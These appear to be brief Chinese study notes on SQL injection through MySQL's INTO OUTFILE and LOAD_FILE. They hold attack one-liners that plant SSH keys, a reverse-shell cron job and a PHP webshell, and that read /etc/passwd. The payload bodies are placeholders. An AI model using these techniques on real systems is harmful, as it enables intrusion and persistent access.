Sql Inject 基于outfile

基于导出，导入文件的注入。目前来说，一般是不能利用的的，它需要在服务器上开启【secure_file_priv】参数

在mysql.init 里设置【secure_file_priv =】后，重启mysql即可使用，默认是关闭或有限访问路径。

查看参数：SHOW VARIABLES LIKE "secure_file_priv";

利用思路：

普通导出文件：select * from users into OUTFILE  'c:\\1.txt';

写入私钥：select 'ssh private text' INTO OUTFILE '/root/.ssh/authorized';

写入定时任务：select 'cron time misstion' INTO OUTFILE '/etc/cron.d/revershell';

写入shell：select 'php shell' INTO OUTFILE '/var/www/html/revershell.php';

加载文件

select HEX(LOAD_FILE('c:\\1.txt'))

select HEX(LOAD_FILE('/etc/passwd'))

select HEX(LOAD_FILE('/etc/issue'))